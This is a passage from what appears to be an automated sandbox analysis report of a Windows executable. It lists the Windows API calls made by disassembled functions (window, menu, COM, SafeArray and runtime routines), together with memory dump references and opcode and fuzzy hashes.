                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                      • String ID: 0.0.0.0
                                                                      • API String ID: 208665112-3771769585
                                                                      • Opcode ID: 816ed5dd017a41cd7b09ae65b52b73ce201099d26f591c1dd6f62795f473fd8c
                                                                      • Instruction ID: 7cd07a5b093b13b1346aa7a435a8a5001799e1b441933ea9d44677a9af90b112
                                                                      • Opcode Fuzzy Hash: 816ed5dd017a41cd7b09ae65b52b73ce201099d26f591c1dd6f62795f473fd8c
                                                                      • Instruction Fuzzy Hash: CF113531500116ABEB61AA34AC4AEDF77BCEB01311F0001AAF689D6091EF7989818B50
                                                                      APIs
                                                                      • timeGetTime.WINMM ref: 01004F7A
                                                                        • Part of subcall function 00FC049F: timeGetTime.WINMM(?,76C1B400,00FB0E7B), ref: 00FC04A3
                                                                      • Sleep.KERNEL32(0000000A), ref: 01004FA6
                                                                      • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 01004FCA
                                                                      • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 01004FEC
                                                                      • SetActiveWindow.USER32 ref: 0100500B
                                                                      • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 01005019
                                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 01005038
                                                                      • Sleep.KERNEL32(000000FA), ref: 01005043
                                                                      • IsWindow.USER32 ref: 0100504F
                                                                      • EndDialog.USER32(00000000), ref: 01005060
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                      • String ID: BUTTON
                                                                      • API String ID: 1194449130-3405671355
                                                                      • Opcode ID: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
                                                                      • Instruction ID: e556d12b6f0ce6fa00e4299a1ea6ae0fd6024d4a8bfcba92b3e385493840b23c
                                                                      • Opcode Fuzzy Hash: b4cb377b898f18b35ccfc9c8aa4c38bd04717003a2869c55a1af83b99519f855
                                                                      • Instruction Fuzzy Hash: D7216270204206AFF7329F34ED89F2A7BA9EB4A789F141018F6C5811E9CB6B4D508B61
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
                                                                        • Part of subcall function 00FA9837: __swprintf.LIBCMT ref: 00FA98AC
                                                                      • CoInitialize.OLE32(00000000), ref: 0100D5EA
                                                                      • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0100D67D
                                                                      • SHGetDesktopFolder.SHELL32(?), ref: 0100D691
                                                                      • CoCreateInstance.OLE32(01032D7C,00000000,00000001,01058C1C,?), ref: 0100D6DD
                                                                      • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0100D74C
                                                                      • CoTaskMemFree.OLE32(?,?), ref: 0100D7A4
                                                                      • _memset.LIBCMT ref: 0100D7E1
                                                                      • SHBrowseForFolderW.SHELL32(?), ref: 0100D81D
                                                                      • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0100D840
                                                                      • CoTaskMemFree.OLE32(00000000), ref: 0100D847
                                                                      • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0100D87E
                                                                      • CoUninitialize.OLE32(00000001,00000000), ref: 0100D880
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                      • String ID:
                                                                      • API String ID: 1246142700-0
                                                                      • Opcode ID: b72896bc8e4fecf03a563238b4a521ec487cf56b425c294d2ff3480f960cb389
                                                                      • Instruction ID: 9ba34da364805203c632b2937b7978b16b6acb29e35df0a6292eb3acdae3ea17
                                                                      • Opcode Fuzzy Hash: b72896bc8e4fecf03a563238b4a521ec487cf56b425c294d2ff3480f960cb389
                                                                      • Instruction Fuzzy Hash: A0B11A75A00109AFDB14DFA4CC84DAEBBB9FF49314F1480A9E949EB251DB74EE41CB60
                                                                      APIs
                                                                      • GetDlgItem.USER32(?,00000001), ref: 00FFC283
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FFC295
                                                                      • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00FFC2F3
                                                                      • GetDlgItem.USER32(?,00000002), ref: 00FFC2FE
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FFC310
                                                                      • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00FFC364
                                                                      • GetDlgItem.USER32(?,000003E9), ref: 00FFC372
                                                                      • GetWindowRect.USER32(00000000,?), ref: 00FFC383
                                                                      • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00FFC3C6
                                                                      • GetDlgItem.USER32(?,000003EA), ref: 00FFC3D4
                                                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00FFC3F1
                                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00FFC3FE
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$ItemMoveRect$Invalidate
                                                                      • String ID:
                                                                      • API String ID: 3096461208-0
                                                                      • Opcode ID: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
                                                                      • Instruction ID: b9b96edc6179990c54d591a34d094dd853c0baaddbec63c1f7aa103c286ded65
                                                                      • Opcode Fuzzy Hash: abe5dec65f2f9b2ae08b0daf141aa54be96f6efda2ca970c901b93221ebecb0d
                                                                      • Instruction Fuzzy Hash: 16513F71B00209ABDB28CFB9DD89AAEBBB6FF88750F14812DF615D7294D7719D008B50
                                                                      APIs
                                                                        • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
                                                                      • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00FA20D3
                                                                      • KillTimer.USER32(-00000001,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FA216E
                                                                      • DestroyAcceleratorTable.USER32(00000000), ref: 00FDBCA6
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCD7
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBCEE
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,00FA16CB,00000000,?,?,00FA1AE2,?,?), ref: 00FDBD0A
                                                                      • DeleteObject.GDI32(00000000), ref: 00FDBD1C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                      • String ID:
                                                                      • API String ID: 641708696-0
                                                                      • Opcode ID: 9fdb8bec29506812e8c02634006e9a7e96a8848935009c559c1541bf37527300
                                                                      • Instruction ID: fc49ccbcbd08a5ee7134db09cf954bb13c01b46d9494f2e628d8057863ad3e49
                                                                      • Opcode Fuzzy Hash: 9fdb8bec29506812e8c02634006e9a7e96a8848935009c559c1541bf37527300
                                                                      • Instruction Fuzzy Hash: E161B171A10601DFCB359F18D948B29B7F2FF41362F248519E4829BA64C77AA891EF90
                                                                      APIs
                                                                        • Part of subcall function 00FA25DB: GetWindowLongW.USER32(?,000000EB), ref: 00FA25EC
                                                                      • GetSysColor.USER32(0000000F), ref: 00FA21D3
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ColorLongWindow
                                                                      • String ID:
                                                                      • API String ID: 259745315-0
                                                                      • Opcode ID: 5afc8e83529b33064d43497682a61c5b032ffa2d86dcb2f3df1a70686d747f0e
                                                                      • Instruction ID: 16d667939f0c9c6b8db40b5e6ab860ce7f1073901231d50467a765d4c086a349
                                                                      • Opcode Fuzzy Hash: 5afc8e83529b33064d43497682a61c5b032ffa2d86dcb2f3df1a70686d747f0e
                                                                      • Instruction Fuzzy Hash: AD41A371600140DFEB715F2CD888BB93BA6EB07371F284255FEA58A1E5C7368C42EB21
                                                                      APIs
                                                                      • CharLowerBuffW.USER32(?,?,0102F910), ref: 0100A90B
                                                                      • GetDriveTypeW.KERNEL32(00000061,010589A0,00000061), ref: 0100A9D5
                                                                      • _wcscpy.LIBCMT ref: 0100A9FF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharDriveLowerType_wcscpy
                                                                      • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                      • API String ID: 2820617543-1000479233
                                                                      • Opcode ID: 453bb1ccf36bef424c12aa6e24da55263924676266cc21a88b76c2bcc2fbf508
                                                                      • Instruction ID: d3bd3960dac38eff9a7973133ceefd3b3288cb7aef860f41b2060735376026f9
                                                                      • Opcode Fuzzy Hash: 453bb1ccf36bef424c12aa6e24da55263924676266cc21a88b76c2bcc2fbf508
                                                                      • Instruction Fuzzy Hash: DA51BC71218301EBD301EF18CD92AAFB7E5EF86340F04482DF9D65B2E2DB759909CA52
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: __i64tow__itow__swprintf
                                                                      • String ID: %.15g$0x%p$False$True
                                                                      • API String ID: 421087845-2263619337
                                                                      • Opcode ID: 55e0723fec7b4d232c56d3e852283f4c2bd7b9fd04d17a21b948ae59bdd2b41b
                                                                      • Instruction ID: 1e4b7c554c1f4a9cb0b7b077cbd87225f7af7c60b4ad9d130356e7dff1eb3657
                                                                      • Opcode Fuzzy Hash: 55e0723fec7b4d232c56d3e852283f4c2bd7b9fd04d17a21b948ae59bdd2b41b
                                                                      • Instruction Fuzzy Hash: 8B41E6729042069FDB24DF34ED42F7A73E9EF46310F28447EE54ADB241EA759906BB10
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 0102716A
                                                                      • CreateMenu.USER32 ref: 01027185
                                                                      • SetMenu.USER32(?,00000000), ref: 01027194
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01027221
                                                                      • IsMenu.USER32(?), ref: 01027237
                                                                      • CreatePopupMenu.USER32 ref: 01027241
                                                                      • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0102726E
                                                                      • DrawMenuBar.USER32 ref: 01027276
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                      • String ID: 0$F
                                                                      • API String ID: 176399719-3044882817
                                                                      • Opcode ID: b0caeb7f7dbda9b35382afc8f864f8326dd5990b6cd473a1ebd9d40fa33a624e
                                                                      • Instruction ID: a513c2f9c7270810678c9d3371271d821b276185a999d22c2c6534a47593c08b
                                                                      • Opcode Fuzzy Hash: b0caeb7f7dbda9b35382afc8f864f8326dd5990b6cd473a1ebd9d40fa33a624e
                                                                      • Instruction Fuzzy Hash: 20418974A01215EFEB20DF68D984E9ABBF5FF59340F140068FA85A7351D736A914CFA0
                                                                      APIs
                                                                      • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0102755E
                                                                      • CreateCompatibleDC.GDI32(00000000), ref: 01027565
                                                                      • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 01027578
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 01027580
                                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0102758B
                                                                      • DeleteDC.GDI32(00000000), ref: 01027594
                                                                      • GetWindowLongW.USER32(?,000000EC), ref: 0102759E
                                                                      • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 010275B2
                                                                      • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 010275BE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                      • String ID: static
                                                                      • API String ID: 2559357485-2160076837
                                                                      • Opcode ID: b4939d886d49ceb6db7ac058b96c545252ce8e30576c4b775223a0cdb860e679
                                                                      • Instruction ID: 6fd77606cb6ed328d2450e37bad15d2da4f27a3a1bd807d3003c4507db854c0d
                                                                      • Opcode Fuzzy Hash: b4939d886d49ceb6db7ac058b96c545252ce8e30576c4b775223a0cdb860e679
                                                                      • Instruction Fuzzy Hash: F4318E31100226ABDF229F64DC08FDA7BB9FF097A0F210219FA9596090C77AD811DBA4
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 00FC6E3E
                                                                        • Part of subcall function 00FC8B28: __getptd_noexit.LIBCMT ref: 00FC8B28
                                                                      • __gmtime64_s.LIBCMT ref: 00FC6ED7
                                                                      • __gmtime64_s.LIBCMT ref: 00FC6F0D
                                                                      • __gmtime64_s.LIBCMT ref: 00FC6F2A
                                                                      • __allrem.LIBCMT ref: 00FC6F80
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6F9C
                                                                      • __allrem.LIBCMT ref: 00FC6FB3
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC6FD1
                                                                      • __allrem.LIBCMT ref: 00FC6FE8
                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00FC7006
                                                                      • __invoke_watson.LIBCMT ref: 00FC7077
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                      • String ID:
                                                                      • API String ID: 384356119-0
                                                                      • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction ID: cac94c8c6d97800e2e071aff3711e220e0ac3d9cd1bea5adca15cea0b4c8af87
                                                                      • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                                      • Instruction Fuzzy Hash: F6712576E44717ABD714EE28DD43F5AB7A9AF04324F14822EF514D7281E774ED00AB90
                                                                      APIs
                                                                      • _memset.LIBCMT ref: 01002542
                                                                      • GetMenuItemInfoW.USER32(01065890,000000FF,00000000,00000030), ref: 010025A3
                                                                      • SetMenuItemInfoW.USER32(01065890,00000004,00000000,00000030), ref: 010025D9
                                                                      • Sleep.KERNEL32(000001F4), ref: 010025EB
                                                                      • GetMenuItemCount.USER32(?), ref: 0100262F
                                                                      • GetMenuItemID.USER32(?,00000000), ref: 0100264B
                                                                      • GetMenuItemID.USER32(?,-00000001), ref: 01002675
                                                                      • GetMenuItemID.USER32(?,?), ref: 010026BA
                                                                      • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 01002700
                                                                      • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002714
                                                                      • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 01002735
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                      • String ID:
                                                                      • API String ID: 4176008265-0
                                                                      • Opcode ID: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
                                                                      • Instruction ID: 581622b4c28afc3b932aeed21c887cd761b34a360bbdea9bca351099c247b597
                                                                      • Opcode Fuzzy Hash: 5150206706a51ccf7fec251efa57efd131ba14df1189b7810549bb6e1d9490e1
                                                                      • Instruction Fuzzy Hash: 0861947050024AAFFB22DF68DC8CDBE7BB8FB45344F140099E982A3291D736A905DB21
                                                                      APIs
                                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 01026FA5
                                                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 01026FA8
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 01026FCC
                                                                      • _memset.LIBCMT ref: 01026FDD
                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 01026FEF
                                                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 01027067
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: MessageSend$LongWindow_memset
                                                                      • String ID:
                                                                      • API String ID: 830647256-0
                                                                      • Opcode ID: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
                                                                      • Instruction ID: c6c8c0bc6a91702a2abda6419026c5ae09e80259ad435aba3408df78e9c5c42e
                                                                      • Opcode Fuzzy Hash: a74dd94033a115203115e3a9f987ce17b3961bec496d66cd2a9210978a636f0d
                                                                      • Instruction Fuzzy Hash: 82619F75900218EFDB21DFA8CC80EEE77F9EF09700F100199FA94AB2A1C775A945CB90
                                                                      APIs
                                                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00FF6BBF
                                                                      • SafeArrayAllocData.OLEAUT32(?), ref: 00FF6C18
                                                                      • VariantInit.OLEAUT32(?), ref: 00FF6C2A
                                                                      • SafeArrayAccessData.OLEAUT32(?,?), ref: 00FF6C4A
                                                                      • VariantCopy.OLEAUT32(?,?), ref: 00FF6C9D
                                                                      • SafeArrayUnaccessData.OLEAUT32(?), ref: 00FF6CB1
                                                                      • VariantClear.OLEAUT32(?), ref: 00FF6CC6
                                                                      • SafeArrayDestroyData.OLEAUT32(?), ref: 00FF6CD3
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CDC
                                                                      • VariantClear.OLEAUT32(?), ref: 00FF6CEE
                                                                      • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00FF6CF9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1389112985.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1389077388.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389165581.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389216480.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1389237880.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_fa0000_SRT68.jbxd
                                                                      Similarity
                                                                      • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                      • String ID:
                                                                      • API String ID: 2706829360-0
                                                                      • Opcode ID: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
                                                                      • Instruction ID: 8ae6bc7202f448265924638e9e16372a71ef7c9aae276106fcd7337c166225a2
                                                                      • Opcode Fuzzy Hash: fea6a7ce6e44ae88c3cc589d889de1511909efce99ecd088d81f491e2162c273
                                                                      • Instruction Fuzzy Hash: CB418171A0011D9FCF10DFA8D8449ADBBB9EF08351F108069FA95E7261CF75AA45DFA0
                                                                      APIs
                                                                        • Part of subcall function 00FA9837: __itow.LIBCMT ref: 00FA9862
